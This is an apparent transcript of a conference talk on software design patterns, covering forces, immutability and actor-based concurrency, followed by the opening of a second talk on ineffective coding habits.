This means we can express the problem as a conflict among forces which really do occur. This is an empirical question. What do we mean by conflict among forces? In building architecture, forces are easy to define, by and large. Gravity defines a force. Yeah? Whatever happens with your building, it had better deal with gravity. Gravity is not an option. You don't plug it in later. That's a given. And it is typically the conflict that matters. Sometimes you're not aware of the conflict, and this is the idea of using this approach, using this kind of three-part rule. If you remember, earlier on I said we care about intention. Whenever you see a solution, what you're looking at is a configuration. Here in the source code, I see a solution. Work backwards. What might this be solving? And then you can determine whether it still solves a real problem, or whether the problem was imagined, or whether it continues to solve a real problem. It's up to you. Work backwards. What are the conflicting forces? We don't normally think about this, so let's try and reason about it and understand what is and is not a pattern. Let me give you something that's not a pattern. Okay? Very simple example. Nothing to do with code. And there's a very simple, obvious answer. I want the simple, obvious answer. I'm giving you a clue here. You walk into a room. It's dark. You need something from the other side of the room, but you cannot see where you are going. What is the obvious solution? Turn on the light. Yeah. Brilliant. Okay. It's not a pattern, though, even though it's been repeated. Even though, as I speak, there are people around the planet turning on lights as they go into darkened rooms. It's not a pattern because there's no conflict in the forces. There's nothing that prevents you from doing that. Let's try that one again. You walk into a room. It's dark. There is a baby asleep in the room.
You need to get something from the other side, but you cannot see where you are going. Ah. Now we've moved ourselves into a design space, because, well, you can turn on the light, but as my wife used to say when our kids were smaller, you wake him, you take him. So, you know, he's your baby, not mine at that point. So the point there is we now have to get thinking. We need to resolve this. Yes, I could turn on the light, but there's a major downside to that. So now you have tension, and it's that tension that we try to resolve with an appropriate solution. Sometimes people are very creative with the solution. There's all kinds of various strategies people pull out. People say, oh, okay, you can use a torch, a flashlight. How many people actually have a flashlight on them? Not a phone, because, it turns out, this is another point that is actually useful for illustrating where people sometimes struggle with patterns. When I run this as a workshop, people often put torch slash phone as if they're the same solution, but they're not. They use the same guiding principle. But let's actually work through the forces and the solution. What's one of the simple properties that torches have that phones don't? Let's do it the other way around. It's easier. Give me a property of a phone that a torch does not share. It's a phone. Exactly. It's a phone. It makes noise. When you walk into the room, make sure the phone bit of your phone is not being a phone. In other words, the one thing it should not behave like is a phone, because otherwise you get the baby. Okay. You never sit there and go, oh, I need to turn my torch to silent. No, that's not an issue. So, in other words, the details of the configuration and the details of the problem you have to solve differ. To make this a good solution, I have to take different action.
If we said anything about the constraints of the torch, for example... I mean, we've got a couple of torches at home, a couple of flashlights. I've got one that's about this big. You can use it as an offensive weapon. If you turn it on, you need to put dark glasses on. Maybe that's not the one we use in the kids' room. So there's an upper limit we need to respect. So there's a range over which this solution makes sense. When we detail the configuration, we have to say, ah, this is what makes it work. Too much light, not good. Whereas with phones, we tend to have the opposite problem. If we use a phone's backlighting or anything like that, it tends to be the opposite. It may not be bright enough, but it's rarely too bright at that level, unless you have a specific torch app. There's another issue of availability. These days, everybody knows where their phone is. And your phone is always fully charged. I have no idea where most of the flashlights in our house are. And, well, I dug one out the other day and discovered the batteries had been dead for years. Phone? No, no problem with that. I know where it is. People have a phone about them. So notice that what we've done is we've actually said, look, the forces you have to resolve with each one of these solutions, the details of the configuration, are actually completely different. Although they use handheld light as a broad guiding principle, they're actually different patterns. Now, this explains the struggle that people sometimes have with a lot of software patterns: things that at one level seem kind of similar, but actually end up being very, very different patterns in practice. Okay? So the Gang of Four, in their book, made a mistake with the iterator pattern. They mixed two versions of iteration, one that uses an iterator object and one that uses callbacks. These are so different. I cannot think of any two design solutions that could be more different.
They're not the same pattern. In other words, they don't belong in the same chapter. They tried to kind of smooth over it. I know why they did it. Partly historical reasons. But the point is, these are two different patterns. They're not the same pattern. They did the same with adapter. There's a class adapter and an object adapter. Adapting a class by inheritance has completely different trade-offs to adapting a class by wrapping it and fully encapsulating it. These are not the same solution, even closely. So it turns out that people get misled by this kind of, oh, it's a similar principle at one level, but actually it's completely different. No, they're different patterns. It's not one pattern with two variations. It's different patterns. So this is worth keeping in mind, this idea of, whenever anybody presents you with a solution, is the problem real? But also, and this seems obvious, the configuration solves the problem. That means it's actually a solution. Which, I mean, I think is obvious, but all too often we get drawn into an idea, and there have been a number of techniques that people have proposed over the years. Here's how to use inheritance. Here's how to override an equals method. Here's how to do this. All of these kinds of little bits and pieces. And yet, in many cases, they don't actually solve the problem they set out to solve, but they look really good. They look like they want to be solutions, and so we follow them through. And again, this is an empirical question. So this is a very simple idea. This applies to all design, but obviously when we're talking about something that is recurrent, this becomes even more important. This is a good litmus test you want to apply to anything that you do. Now, when we talk about patterns, a lot of people immediately want to see a catalog. I want to find lots of online patterns. I want to find patterns in books. And it's just like everybody comes back with the same, same damn pattern every time.
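The class-adapter versus object-adapter distinction can be sketched in Java. The names here (LegacyLogger, Logger and so on) are invented for illustration, not from the talk; the point is only that the inheritance form cannot help exposing the legacy interface, while the wrapping form fully encapsulates it.

```java
// Hypothetical legacy class with an awkward interface.
class LegacyLogger {
    public String writeLine(String text) {
        return "LOG: " + text;
    }
}

// The interface our own code actually wants to talk to.
interface Logger {
    String log(String message);
}

// Class adapter: adapts by inheritance. A ClassAdapter *is a*
// LegacyLogger, so writeLine and everything else leak through.
class ClassAdapter extends LegacyLogger implements Logger {
    public String log(String message) {
        return writeLine(message);
    }
}

// Object adapter: adapts by wrapping. The legacy object is fully
// encapsulated; clients see only the Logger interface.
class ObjectAdapter implements Logger {
    private final LegacyLogger legacy = new LegacyLogger();
    public String log(String message) {
        return legacy.writeLine(message);
    }
}

public class AdapterDemo {
    public static void main(String[] args) {
        System.out.println(new ClassAdapter().log("hello"));
        System.out.println(new ObjectAdapter().log("hello"));
    }
}
```

Both print the same thing, but the trade-offs differ completely: the class adapter is coupled to the legacy type forever, the object adapter can swap or hide it at will.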
I went to the pattern shop and look what I bought. Okay. I'm not going to talk about Singleton, because of my beliefs on style. What you're trying to do is make a place habitable. You're trying to solve problems, not create new problems. If you do a Google search for Singleton, for example, half the results are: I've got a Singleton and I've got this problem. Right. Let's analyze that. What's the motivation of the problem? I have a Singleton. How could I fix this problem? Not have a Singleton. Solved. Done. Okay. That consultancy was free. Okay. Let's talk about another problem, another space that people find themselves in that is a little more... I can't read this. You have to read it. I want to talk about habits and the way that we develop a mindset. We develop a mindset for solving problems. Habits that are formed by our programming language and by our projects. We become familiar with a way of solving something. And we assume that everything fits with that. And we see the world through these. And sometimes we need to revisit and reframe it completely. So let me give you a very simple example: the concept of concurrency. Concurrency is now available fundamentally, deeply, in the hardware. Concurrency is used for countless reasons. Normally when you ask people, why do you want to make this concurrent, the reason is performance. Sometimes the reason is because everybody else is doing it. That's not a good enough reason. Sometimes the reason is because I haven't got it on my CV. That's not necessarily a bad reason, but try and do it privately at home. But most often the reason is we want concurrency because we want to improve performance. Now what's interesting is people were still saying this a few years ago when we were mostly single core. It's just like, okay, there's some things we need to discuss there. There are reasons you want to do concurrency. It's to do with simplicity of expression.
But the really interesting thing happens when you say concurrency. You say, right, okay. When I say concurrency, what's the first word that comes into your head? I used to do this in workshops. And pretty much without fail, I'd say, I say concurrency, you say the first word that comes into your head, and it's threads. Okay, right. So I say threads, and the first word that comes into your head: people will say locks or synchronization. And it's at this point that I need to state: okay, so what is a lock? What is the synchronization primitive? A synchronization primitive is the anti-thread. It is against concurrency. It works because it reduces concurrency. So if your goal is to have concurrency, and you really want that for performance reasons, and you have a lock-based architecture, what you're doing is you're saying: we want concurrency, but actually we were kidding. Because what we're doing is actually slowing it down there. And this is a problem. Where did this problem come from? It comes from a path that we have taken historically. People started with procedural code, sequential code, started moving into objects, still largely sequential, often event driven. And then we added threads. But threads were added very much as a procedural abstraction. Threads are effectively the go-to of concurrency. I don't mean that in a necessarily bad way. The go-to is the most powerful primitive control structure, in the sense that you can build every other control structure out of a go-to. It's just that sometimes it does feel like banging rocks together. And sometimes you miss and it hurts. That's why we don't use go-tos. Just remember goto fail and all these other ones. Security, you know. Next time somebody looks like they are going to use any form of fancy break... I saw somebody say, oh, this isn't a go-to, and it was a label break. And it's like, no, that's a go-to.
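The anti-thread point about locks can be made concrete with a small sketch, invented for illustration rather than taken from the talk. Two threads share a counter and the result is correct, but only because the lock forces them to take turns: inside the critical section there is no concurrency at all, which is exactly what makes it safe and exactly what limits any speed-up.

```java
public class CounterDemo {
    private int count = 0;
    private final Object lock = new Object();

    // Each increment takes the lock, so however many threads run
    // this, they execute the critical section strictly one at a
    // time. Correctness is bought by removing concurrency.
    void increment(int times) {
        for (int i = 0; i < times; i++) {
            synchronized (lock) {
                count++;
            }
        }
    }

    int runWithTwoThreads(int timesEach) {
        Thread a = new Thread(() -> increment(timesEach));
        Thread b = new Thread(() -> increment(timesEach));
        a.start();
        b.start();
        try {
            a.join();
            b.join();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        return count;
    }

    public static void main(String[] args) {
        // Deterministically 200000, because the lock serializes
        // every single increment across both threads.
        System.out.println(new CounterDemo().runWithTwoThreads(100_000));
    }
}
```

Drop the synchronized block and the count becomes unpredictable; keep it and the two threads spend their time queueing. That tension is the force the immutability discussion that follows is trying to dissolve.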
I rephrased this code. It was a piece of JavaScript I found online the other day. I had nothing better to do with my Saturday morning than look at JavaScript. It must have been a bad Saturday, for sure. And it was really interesting: just dealing with a label break, you can actually end up with a much more elegant and more optimal piece of code that is less likely to trigger the next great security bug. So they're primitive, but primitive in a way of being constructive, and also primitive in that we make mistakes. Threads are like that. They are the most powerful construct. You can build any other concurrency concept out of them, but you can also hit your fingers, and it hurts. I think the other thing to notice is that many of our approaches to solving this stuff are based on this problem of: we're going to take a piece of code and we're going to add locks. I've had consultancy visits where I've been told, right, we've got this code base and we're adding threads, and it's just like, I'm going to try and find the exit at this point, because adding threads to an existing code base doesn't sound safe. Normally it's been built around sequential assumptions and it's been built up like that. So we need to work out where to add locks. Here's a very simple approach. Let's not add locks. Let's look at this. I'll skip the wording. The thing I'm interested in is: this is an immutable value. Let's rearrange the problem. The example I normally use with this one is simply a date class. I've got a bit of Java here. We get a date class. Obviously it gets bigger, because everybody always adds more features, and we've gone and done the usual habit of get and set, because our IDE gave us the option of get and set, and we like the fact that get and set rhyme. We think that's really neat, so we make our gets and sets and they all line up beautifully. And then we implement it one way, and we've just about got the constraints worked out when somebody says, that's really stupid.
You should do it like this. And guess what? All the getter code is really easy, but we have an awful lot more setter code. It turns out that to write this correctly you need about twice as much setter code as getter code, and you get very, very clever and you spend a lot of time on this class. And then one day, out of nowhere, somebody comes in, somebody from the outside world whom you employ, who has seen the light somewhere else, and they say, oh no, why don't you try this? What? Get rid of all the setters. Can you do that? Yes, it's allowed. And suddenly you have an object that can never, ever change, and while you're at it you decide it's a stupid naming convention anyway. Here you have an object that will never, ever, ever change, and if it never, ever, ever changes, then the amount of synchronization I need is none. Because this is the other thing that's locked up in people's minds, and I find this one as well; I've actually done this on a couple of consultancy visits. One of them was more memorable than the other, because people were looking at me like, have we got the right guy in? Because I was saying things like, well, okay, so why do you need synchronization? Well, we need synchronization to make the code thread safe. Okay, so why is it not safe? Well, because we've got threads. Okay, I'm still not with you. And they think, oh jeez, he's an idiot. I say, why are you making the code unsafe? You know, what are you guys doing to make it unsafe? Why would you write unsafe code? That's how you turn it around. They say, well, you have two threads and they're looking at the same piece of data. Yeah, I don't see any problem with that. He really is stupid. Look, one of the threads might change it. Whoa, hang on, you never said anything about that. You never said anything about change. Clearly that's the most important thing that's going on, but it's the last thing you said. And this is really interesting, because it's not people being stupid.
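The rewrite being described, getting rid of the setters entirely, might look something like this minimal sketch (class and method names are mine, and the validation is deliberately crude):

```java
// Drop the setters and the object can never change after construction, so
// sharing it between threads needs no synchronization at all.
final class ImmutableDate {
    private final int year;
    private final int month;
    private final int day;

    ImmutableDate(int year, int month, int day) {
        if (month < 1 || month > 12 || day < 1 || day > 31) {
            throw new IllegalArgumentException("invalid date");
        }
        this.year = year;
        this.month = month;
        this.day = day;
    }

    // Queries only: there is no way to modify an existing instance.
    int year()  { return year; }
    int month() { return month; }
    int day()   { return day; }

    // "Modification" produces a new value; the original is untouched.
    ImmutableDate withDay(int newDay) {
        return new ImmutableDate(year, month, newDay);
    }
}
```

All the clever setter code that had to re-validate the constraints on every change simply disappears: the constructor is the one place the invariant is checked.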
What you're doing is reflecting a deeper set of assumptions: people start from the position that all data is modifiable. I can change things. I can assign. I can modify. That's an entitlement. When I create objects, I am entitled to modify the state of those objects. That's kind of built into a lot of programmers without them realizing it. They picked it up as a habit. What we're doing is going in there and questioning it. Now, immutability is a good idea for a number of reasons, particularly in reference-based languages, and particularly if you don't want bugs. It turns out that most bugs arise through accidental state change. You get a lot fewer bugs if you don't have state change. This has always been true. This is nothing new. But what's really interesting about concurrency is that it takes these basic issues and plugs them into a huge great amplifier with a Marshall stack a stage wide, and it makes your little annoyances into real, real problems. That's the amplification effect. That's one of the reasons we care about this stuff. So this little, oh well, we can change them? Why don't we just get rid of that? There's this old joke: doctor, doctor, every time I do this, it hurts. What does the doctor say? Don't do that. Yeah. Doctor, doctor, every time I have shared mutable state, it hurts. Well, don't do that. Why would you do that to yourself? So sometimes we don't reason about our habits. We need to go back. This is why revealing this assumption is important. Now, there's another technique that shares some of the same structure: copied objects. If I re-render that date example in C++, a language in which copying, passing around by copy, is indigenous and effectively at the core of the language, and we make the same simplifications, we might be tempted to put in a setter method. Forget that. You don't need it. You can get rid of it completely.
The only way to change state is through an assignment binding, and we're done. But it turns out the thing we're really interested in is those little things in the italics: the copying behaviour. When you copy something, it also has this very profound effect. If I give you a copy of something, you can run off with it in a different thread if you like. You can do what you want with it, because it's a copy. There's nothing you can do to it that will ever need synchronizing with my copy, because mine's the original. And this is important. Both of these share an underlying solution structure, which we can put quite simply as a sort of synchronization quadrant. This is all you ever really need to know about how to architect systems with concurrency. And it's a quadrant diagram, so you know it's simple. Quadrant diagrams organize the universe into two axes of two things, and there's normally one quadrant that's really, really bad. I've made that even easier for you by making it red, or at least some approximation of red. So it turns out that if you have immutable state, then life is good. Life is easy. There is no synchronization. You're not slowing anything down. You can't get the synchronization wrong, which is nice. On the other hand, if you pass things around and everything is copied by default, if you're trading in copied items, then again you're not revealing state that can be changed. The individual copies might be changeable, but they are isolated. So it turns out that these are both reasonable solutions. It leads to a complete reframing of how we should think about this. Sometimes people start off from: I have a modifiable object that I am sharing. That's your starting position. That's a bad starting position, because that puts you in the top right-hand quadrant, which is the quadrant of pain and synchronization and debug sessions and all this kind of stuff, and intermittent errors.
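As an illustrative sketch of the copying quadrant (my own example, not from the slides): the owner keeps its mutable list private and only ever hands out copies, so nothing a caller, or another thread holding a copy, does can ever need synchronizing with the original.

```java
import java.util.ArrayList;
import java.util.List;

// Unshared mutable state inside; everything crossing the boundary is a copy.
class RecentFiles {
    private final List<String> files = new ArrayList<>(); // never exposed

    void open(String name) {
        files.add(name);
    }

    // Hand out a snapshot copy, never the internal list itself.
    List<String> snapshot() {
        return new ArrayList<>(files);
    }
}
```

The individual copies are changeable, as the talk says, but they are isolated: mutating a snapshot has no effect on the owner.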
So it's very, very simple, but the problem is that until you plug this into the amplifier of concurrency, it's not obvious that this is the issue. Many people start from a different position. That's where most of the problems people have encountered with concurrency come from, either at a personal level or with frameworks, because guess what? Most of these frameworks that were given to you, either payware or freeware, were actually written by people who had the same kind of mindset. They started from the position that state is modifiable and now we need to fix that, rather than starting from a different set of assumptions. I should look the other way before I cross the road, for example, rather than compensate for it afterwards in some other way. What we're going to do is start from a different position completely. And this is the issue: shared mutable state is a problem. Bartosz Milewski had this wonderful observation: shared memory is like a canvas where threads collaborate in painting images, except they stand on opposite sides of the canvas and use guns rather than brushes. The only way they can avoid killing each other is if they shout "duck!" before opening fire. You look at some code bases and you see, yeah, this is a war zone. It's just like, well, if we synchronize that, what happens to this over there? Well, we might get deadlock. Oh my God, what are we going to do? And then people start doing all kinds of crazy things. Well, maybe if we use some kind of atomic thing here, and it's just like, boom, a mushroom cloud rises above the code. It turns out that we've known about this for a very long time. This is the Chinese translation of 97 Things Every Programmer Should Know, conveniently translated back into English for your reading ability. Russell Winder, in "Message passing leads to better scalability in parallel systems", makes exactly this observation.
Instead of using threads and shared memory as our programming model, we can use processes and message passing. A process here means protected independent state with executing code, not necessarily an operating system process. In essence, very much what people originally imagined objects to be, rather than the kind of glorified abstract data types that we normally program them to be. Languages such as Erlang, whose elements were invented in the 70s and which has more recently become popular, and Occam before it (although technically Occam may have post-dated those elements), have shown that processes are a very successful mechanism for programming concurrent and parallel systems. Such systems do not have all the synchronization stresses that shared-memory multi-threaded systems have. There's another benefit here: performance. It's not simply simplicity of programming and reasoning, although simplicity of programming often equates to simplicity of reasoning. If you can fit the ideas of a program in your head and reason about them, then it is simple. If you cannot, then it's difficult. That's it. We are the bottleneck in software development. And this gives us this idea that, in particular, Occam is based on a thing called communicating sequential processes, CSP, and Erlang is based on a different model, the actor model. Andrei Alexandrescu, who has been at this conference, made a wonderful observation about multi-threading a few years ago: multi-threading is just one damn thing after, before, or simultaneous with another. Great quote. A far less interesting quote would be the following: actor-based concurrency is just one damn message after another. That's it. It's really boring. We find that actor-based computation is incredibly simple to reason about, because wherever you are in the code, you don't have threads as primitives.
You simply have an object that can respond to a message in its own time, in its own sequence, and it chooses what it's going to select. It says, I'm prepared to receive this, and I do something related to that, and maybe I send a message off. I have no idea where it's going to, effectively, and no idea where this is coming from. It's typically asynchronous in structure. But what you have is the idea that wherever you are within each actor (a specialized kind of object, effectively), it's sequential. The world is single-threaded. Wherever you are standing, it's single-threaded. The overall composition of all of these objects may be concurrent, but wherever you are, it's single-threaded. It feels single-threaded. Everything's happening in a well-defined order. That's what makes this and other models like it very, very attractive: they simplify things in a way that we can understand. We can do things one thing at a time. Yeah, that's not a problem. This is actually an experience from a few years ago. I did a master's degree, and I thought that I was going to emerge into the industry and everybody would be doing actor-based computation. This is one of the books I based my thesis on. Everybody would be doing actor-based computation, but it turns out everybody was migrating to Windows 3.1 at the time. It was not for another two decades that people said, hey, this actor idea, that's quite cool. It turns out it is quite cool, for very simple reasons. It's very unexciting, because it allows you to reason about things. The mental frame that you get is very much: wherever you are, it's sequential. I communicate with other people, and they respond in their own good time. It's inherently asynchronous, very, very relaxed. You hide all of the mechanics. Beneath it, you'd implement it with threads, for example.
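A hedged sketch of that idea using plain JDK classes (this is not a real actor library, and the names are mine): the actor owns its state and a mailbox, and a single worker thread processes one message at a time, so inside the actor the world is sequential and the counter needs no locks.

```java
import java.util.concurrent.BlockingQueue;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.concurrent.SynchronousQueue;

// One mailbox, one worker: messages are processed one after another.
class CounterActor {
    private final BlockingQueue<Runnable> mailbox = new LinkedBlockingQueue<>();
    private final Thread worker;
    private int count = 0; // touched only by the worker thread, so no locks

    CounterActor() {
        worker = new Thread(() -> {
            try {
                while (true) {
                    mailbox.take().run(); // one damn message after another
                }
            } catch (InterruptedException stop) {
                // interrupted: shut down quietly
            }
        });
        worker.start();
    }

    void increment() {
        mailbox.add(() -> count++); // send a message instead of taking a lock
    }

    // Ask for the count by message; the reply arrives on a rendezvous queue.
    int count() {
        SynchronousQueue<Integer> reply = new SynchronousQueue<>();
        mailbox.add(() -> {
            try {
                reply.put(count);
            } catch (InterruptedException ignored) {
            }
        });
        try {
            return reply.take();
        } catch (InterruptedException e) {
            throw new IllegalStateException(e);
        }
    }

    void shutdown() {
        worker.interrupt();
    }
}
```

Because the mailbox is FIFO, the query message necessarily runs after every increment sent before it; callers never see a half-updated state.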
You can hide all the mechanics, but the idea is that in your world view you never have any raw threads, you never have any raw synchronization. It's just a simple world view. And it's that which allows this to be a very scalable model as well. Now, there are a number of other approaches we could keep talking about, but I just wanted to use that as a context and an example of a shift. This quote I think is interesting: "I believe the current state of the art of computer programming reflects inadequacies in our stock of paradigms, in our knowledge of existing paradigms, in the way we teach programming paradigms, and in the way our programming languages support, or fail to support, the paradigms of their user communities." The word paradigm is used here; it's from a paper called "The Paradigms of Programming", published in 1979. If you're ever going to use the paradigm word, read this paper first. Make sure that anybody who uses the paradigm word in your company reads this paper first, because, well, first of all it'll stop them using it, which will be really good. Oh, we're undergoing another paradigm shift. That's business speak; we need less of that. But actually this paper makes a really good case for what we call patterns. When you read the paper, you suddenly realize he's talking about design styles, recurrent design styles. That's what he's talking about. We now have a term for it, patterns, but he was referring to it with another use of the term paradigm. This is Robert Floyd. He won the Turing Award in 1978; this is his Turing Award paper and speech. And he makes this observation, and it still feels incredibly true. He talks about the user communities. So let's go back to this idea of patterns. Who do patterns speak to? The audience of patterns is ultimately always human.
Although we may use libraries and software generators to help us in support of them, it's ultimately the human being that is responsible for reasoning through: we've got this context, we've got this problem. What are the forces? Is that an appropriate solution? What are the consequences of applying this solution? What are the trade-offs? Always explore the trade-offs. Does it make it easy to develop but very, very slow, or is it really, really fast but hard to develop? These are trade-offs. One of my favourite proposed solutions to the walking-into-a-room-with-a-baby problem is: use night-vision goggles. If you get a room full of geeks and you work on this problem, normally one or two groups will propose night-vision goggles. I know it's a good workshop when every single group proposes night-vision goggles. And it's a serious workshop when people start using actual model numbers. But obviously one of the trade-offs is, yeah, you might not have them available. They might cost a little bit. The point is that we explore the trade-offs. We use automation to get us somewhere, but it is you, ultimately, that makes the decision. Which also tells us something else about the idea of patterns. And that's a book, it's got patterns in it. But the original vision of patterns, from Christopher Alexander, the architect, was not simply that we would reuse ideas that other people had mined; we would look at our own experience and see what worked as well. People often think patterns are written by pattern authors, people who write books and stuff like that. But actually, it can be very ordinary people, even ordinary Norwegians. Good grief. This is Cisco, formerly Tandberg. We ran a patterns exercise there a couple of years ago.
A proper workshop, actually getting folks to look at some of their own code and say, well, what are the techniques that we use that perhaps are not visible elsewhere, that other people might not know about? In fact, the way I framed it was very much: imagine I were to join your team on Monday. What design approaches, what kind of typical arrangements do you guys use that I might not be familiar with but would help me understand how your code is put together? Little bits and pieces like naming conventions, where files live, your philosophy of use of the version control system, what granularity you use it at, how the build system works. All of these things are really helpful. But ultimately, how does it all fit together? What's your philosophy? Give me the style, so to speak. And we may not have the words for that. So this is a case of mining the patterns: basically looking into your own design to see what works. Now, this idea of explanation goes a lot further as well, of explaining a thing that already exists. We can actually tell a story about it, because clearly you don't just want to give people a pile of patterns that you use; that's not very helpful. This is one of the better known examples: the JUnit storyboard. Kent Beck and Erich Gamma documented this many years ago. What is interesting about it is that it effectively summarizes the whole article at the end. It shows you how to write JUnit from scratch. It shows you each decision. And then it shows you at the end, in order, almost like a zoomed-out view, how it grows, one decision at a time, and it expands. That's really quite cute. We followed a very similar model in POSA 4, with a system that Siemens had developed, a warehouse management system. Our story was 100 pages long and involved 50 patterns. And it told the story of how the system was developed.
But the thing you have to remember is: did it really happen like that? Well, no, it didn't. We're taking some basic liberties with this. The historian of science and TV presenter James Burke noted: history rarely happens in the right order at the right time. The job of a historian is to make it appear as if it did. What we're doing is saying: it's as if this had happened. Because you're normally going to end up with, you know, I walk in on Monday and I see this bit where you've got the callback between the broker and this other resource allocator. And how did you come up with that piece of design? You're having a chat with the chief architect, and the architect says, oh yeah, that one came to me in the shower. How useful is that? You're sitting there going, okay, so I need to take a shower in order to understand the design. I need to take a shower with the architect in order to understand the design. The problem is, although that may be a true statement, it doesn't help you understand. So the point about these stories is that, as with most stories, it's not a true retelling, but it's as if it could have been. Either something comes to you in a moment of inspiration, and what you do is disentangle it and say, this happened, then this happened, then this happened; you get this problem if you apply this technique, then you resolve it with this, and then that leads to this, and then you're done. You make it as if it were that. Or, alternatively, you spent a year wandering the wilderness, kept making mistakes, and rather than bore the poor person with all of the mistakes you ever made, you compress the whole story into: imagine you did this, and then solved that problem, and then, and then, and then you're done. So these stories are based on reality, but they don't have to be real stories.
But you're able to tell a story through the design decisions that we see, and patterns provide a recurrent vocabulary. Now, to wrap up, there's a really neat idea that goes beyond this: the idea of a pattern language. What are all the possible solutions? The JUnit storyboard is one single story, but there are lots of different ways of writing a testing framework. I could show you all the branches and decisions that you might possibly take in designing a testing framework. That would be very difficult and very rich, and how do you write such a thing? It's quite difficult to write a good pattern language and present it visually. A chap called Jim Siddle a couple of years ago had a moment of inspiration. He went back to those Choose Your Own Adventure books, where you reach the end of a particular page and it says: if you want to take the tunnel on your right, turn to page 53, but if you want to take the tunnel on your left, turn to page 72. And so you get to explore the design decisions. He did this with a pattern language that Frank Buschmann and I developed for one of the POSA books, and he brought it to life. You realize the framework needs a logging facility for requests and wonder how logging functionality can be parameterized, and so on. If you wish to use inheritance, turn to seven; if you prefer the use of delegation, turn to three. It's a really neat little paper, and in it he explores all the possibilities. So this is an idea of using patterns as a way of communicating knowledge, but also of showing how knowledge fits together. You're almost getting paper-based designs that you can explore, figure things out with and draw conclusions from. So there's an experimental aspect to that. It's very, very promising but, from the author's point of view, very labour intensive. But as an idea, don't feel you have to write this stuff down.
It's just the stuff we might do at a whiteboard. When you're showing somebody, you can do it this way or this way. Informally, you can create this. What you're doing is mapping out the design landscape for them. So I will end with something that I wrote up a few years ago when I was really frustrated. Everybody was coming up with a stupid manifesto, and I thought, you know what? Patterns doesn't have one. It's time we had a stupid manifesto. And it's a very simple one. It is this idea: we are uncovering better ways of developing software by seeing how others have already done it. That is the premise. That doesn't solve every problem. But if you look at most software systems, 90 to 95 percent of what is done in those systems is not new. And yet we still struggle, through lack of communication or our inability to reason about these things, through insufficient knowledge, if you like. So the whole premise of patterns was really, as Brian Foote observed, a blatant disregard for originality. Let's actually just look at the things that we know work and get on with those, so we can build the things that are new. Thank you very much.
Apparently, everyone knows about patterns. Except for the ones that don't. Which is basically all the people who've never come across patterns... plus most of the people who have. Singleton is often treated as a must-know pattern. Patterns are sometimes considered to be the basis of blueprint-driven architecture. Patterns are also seen as something you don't need to know any more because you've got frameworks, libraries and middleware by the download. Or that patterns are something you don't need to know because you're building on UML, legacy code or emergent design. There are all these misconceptions about patterns... and more. In this talk, let's take an alternative tour of patterns, one that is based on improving the habitability of code, communication, exploration, empiricism, reasoning, incremental development, sharing design and bridging rather than barricading different levels of expertise.
10.5446/50613 (DOI)
Right, good afternoon. Is that coming through? Yeah, okay. Thank you to Thomas Eccley for taking a picture of me and posting it saying that if anybody looks like an evil genius, it's me. Thank you. I like that. That's a good start to the day. I'm going to use that one with my kids: you know, do the right thing, or else. Okay, so you've had a hard choice. I know you've had a hard choice, because I've looked at the program, and this is a hologram of me; the real me is in one of the other talks that's going on at the moment. There's quite a lot on at the moment. Are we going to learn about holograms? No, sorry, that's far too technical for first thing in the afternoon. That's why these speakers are on at this time. So I'm going to give you seven things. I like magic numbers, so we're going to go for seven: seven ineffective coding habits of many programmers. Chances are you do at least one of these. That's not necessarily a bad thing. I have done at least one of these; I'm not going to tell you how many. That's the whole point. We learn by trying things out, but we need to be a little more empirical, a little more experimental with some of our habits, because we acquire habits. That's the whole point. We pick habits up because they are low energy. You don't have to think about everything. If you have a habit, it makes it easy to do something. This is a good thing, not a bad thing. The problem, though, is that we sometimes pick up habits without really thinking about it. We suffer from a lot of cargo-cult programming and borrowed habits: habits that we picked up years ago from different environments that no longer apply, or habits that we follow because, well, everybody else does. If you are a parent, you may have already encountered this one. Why are you doing that? Because so-and-so at school does it. Oh, okay.
If so-and-so jumped off a cliff, would you do it? This is a standard parent line. You get a free pack of parental quotes when you get a kid. My older boy is turning into a teenager, so we're finding a whole new chapter. It's fantastic. That's the point: do we just do things out of habit? Do we follow habits out of habit? That is the problem. I want to question some here. You will undoubtedly disagree with me on a few of them. That's a good thing, because it shows you're awake. But please reason through them. Really think about it, because, as I said, some of these I've tried and sleepwalked into, and in other cases I've kind of felt there was something not quite right from the start. So, those things there: I can't actually speak Chinese, but these have been conveniently translated for me. A couple of these things might be relevant as I talk. This is probably more relevant: I write when I'm not writing code. I write a little bit of short fiction. And this means that I really do care a lot about readability and reading and style. Doug Crockford noticed in the very slim volume (unsurprisingly slim) JavaScript: The Good Parts that style matters in programming for the same reason it matters in writing: it makes for better reading. And I want to emphasize that many of our reading habits are precisely that: they are habits. Reading is not a natural state for a human being. Again, if you've got children, you realize that reading is one of the last things they actually learn. It's really not one of those things like eating, walking or talking. Reading is a far more subtle thing, and therefore it taps on parts of our brain that we're not expecting. It taps on areas that we would consider when we talk about visual design. It taps on areas to do with reasoning. It's not a single place. Reading covers a very wide range of brain matter, if you like.
And it is a learned practice. So anything you can learn, you can learn differently. But I want to try and talk about this in terms of properties. Let's start off with picking out the signal from the noise. Just as a general point: if you remember, a few years ago it was very popular for the Earth to end. This was announced for Friday the 13th. I was in New York, at the World Trade Center. If you're going to announce the end of the world, that's a really good place to do it, and a good date. But this guy was just lost in the noise. It turns out the world didn't end then. And it didn't end in October that year either. And it didn't end at the end of 2012. We were supposed to have Ragnarok in February. That didn't happen either. You know, it's a good excuse for a party. So let's talk about noise. Let's talk about picking out the signal from the noise. Signal-to-noise ratio is an engineering term, but we often repurpose it. We talk about it as a measure used in science and engineering comparing the level of a desired signal to the level of background noise. But in everyday conversation, we talk about it as the ratio of useful information to false or irrelevant data in a conversation or exchange. So let's pick on a fairly famous piece of English. William Shakespeare apparently wrote other stuff, but this is the only bit that ever gets quoted. This is quite a nice piece of English. It's quite dramatic. He makes extensive use of short words, and yet it's very, very deep in meaning. Can we make it clearer? Could we perhaps translate it into office speak or business speak or marketing speak? Well, conveniently enough, somebody's already done that: a fellow called Tom Burton, in a book called Long Words Bother Me, a very interesting book on language. And he translated this into marketing speak. Enough with "to be or not to be". Continuing existence or cessation of existence. Those are the scenarios.
